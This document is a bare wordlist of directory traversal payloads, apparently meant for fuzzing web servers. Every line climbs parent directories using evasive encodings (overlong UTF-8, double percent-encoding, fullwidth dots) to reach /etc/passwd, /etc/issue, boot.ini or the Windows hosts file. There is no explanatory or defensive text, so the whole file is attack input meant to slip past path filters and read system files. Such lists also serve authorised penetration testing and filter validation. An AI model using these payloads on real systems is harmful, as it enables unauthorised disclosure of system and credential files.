-%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66etc%%32%%66issue -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66boot.ini -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66etc%%32%%66passwd -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66etc%%32%%66issue -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66boot.ini -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66etc%%32%%66passwd -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66etc%%32%%66issue -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66boot.ini -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%fe%c0%fe%%35%%63etc%%35%%63passwd -%c0%fe%c0%fe%%35%%63etc%%35%%63issue -%c0%fe%c0%fe%%35%%63boot.ini -%c0%fe%c0%fe%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63etc%%35%%63passwd -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63etc%%35%%63issue -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63boot.ini -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63etc%%35%%63passwd -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63etc%%35%%63issue -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63boot.ini -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63etc%%35%%63passwd -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63etc%%35%%63issue -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63boot.ini -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63etc%%35%%63passwd -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63etc%%35%%63issue -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63boot.ini -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63etc%%35%%63passwd -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63etc%%35%%63issue -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63boot.ini -%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63%c0%fe%c0%fe%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%fe%c0%fe%e0%80%afetc%e0%80%afpasswd -%c0%fe%c0%fe%e0%80%afetc%e0%80%afissue -%c0%fe%c0%fe%e0%80%afboot.ini -%c0%fe%c0%fe%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afetc%e0%80%afpasswd -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afetc%e0%80%afissue -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afboot.ini -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afetc%e0%80%afpasswd -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afetc%e0%80%afissue -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afboot.ini -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afetc%e0%80%afpasswd -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afetc%e0%80%afissue -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afboot.ini -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afetc%e0%80%afpasswd -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afetc%e0%80%afissue -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afboot.ini -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afetc%e0%80%afpasswd -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afetc%e0%80%afissue -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afboot.ini -%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%af%c0%fe%c0%fe%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%fe%c0%fe%25c1%259cetc%25c1%259cpasswd -%c0%fe%c0%fe%25c1%259cetc%25c1%259cissue -%c0%fe%c0%fe%25c1%259cboot.ini -%c0%fe%c0%fe%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cetc%25c1%259cpasswd -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cetc%25c1%259cissue -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cboot.ini -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cetc%25c1%259cpasswd -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cetc%25c1%259cissue -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cboot.ini -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cetc%25c1%259cpasswd -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cetc%25c1%259cissue -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cboot.ini -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cetc%25c1%259cpasswd -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cetc%25c1%259cissue -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cboot.ini -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cetc%25c1%259cpasswd -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cetc%25c1%259cissue -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cboot.ini -%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259c%c0%fe%c0%fe%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%fe%c0%fe%25c0%25afetc%25c0%25afpasswd -%c0%fe%c0%fe%25c0%25afetc%25c0%25afissue -%c0%fe%c0%fe%25c0%25afboot.ini -%c0%fe%c0%fe%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afetc%25c0%25afpasswd -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afetc%25c0%25afissue -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afboot.ini -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afetc%25c0%25afpasswd -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afetc%25c0%25afissue -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afboot.ini -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afetc%25c0%25afpasswd -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afetc%25c0%25afissue -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afboot.ini -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afetc%25c0%25afpasswd -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afetc%25c0%25afissue -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afboot.ini -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afetc%25c0%25afpasswd -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afetc%25c0%25afissue -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afboot.ini -%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25af%c0%fe%c0%fe%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%fe%c0%fe%f0%80%80%afetc%f0%80%80%afpasswd -%c0%fe%c0%fe%f0%80%80%afetc%f0%80%80%afissue -%c0%fe%c0%fe%f0%80%80%afboot.ini -%c0%fe%c0%fe%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afetc%f0%80%80%afpasswd -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afetc%f0%80%80%afissue -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afboot.ini -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afetc%f0%80%80%afpasswd -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afetc%f0%80%80%afissue -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afboot.ini -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afetc%f0%80%80%afpasswd -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afetc%f0%80%80%afissue -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afboot.ini -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afetc%f0%80%80%afpasswd -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afetc%f0%80%80%afissue -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afboot.ini -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afetc%f0%80%80%afpasswd -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afetc%f0%80%80%afissue -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afboot.ini -%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%af%c0%fe%c0%fe%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%fe%c0%fe%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%fe%c0%fe%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%fe%c0%fe%f8%80%80%80%afboot.ini -%c0%fe%c0%fe%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afboot.ini -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afboot.ini -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afboot.ini -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afboot.ini -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afboot.ini -%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%af%c0%fe%c0%fe%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%uff0e%uff0e/etc/passwd -%uff0e%uff0e/etc/issue -%uff0e%uff0e/boot.ini -%uff0e%uff0e/windows/system32/drivers/etc/hosts -%uff0e%uff0e/%uff0e%uff0e/etc/passwd -%uff0e%uff0e/%uff0e%uff0e/etc/issue -%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/windows/system32/drivers/etc/hosts -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/issue -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/system32/drivers/etc/hosts -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/issue -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/system32/drivers/etc/hosts -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/issue -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/system32/drivers/etc/hosts 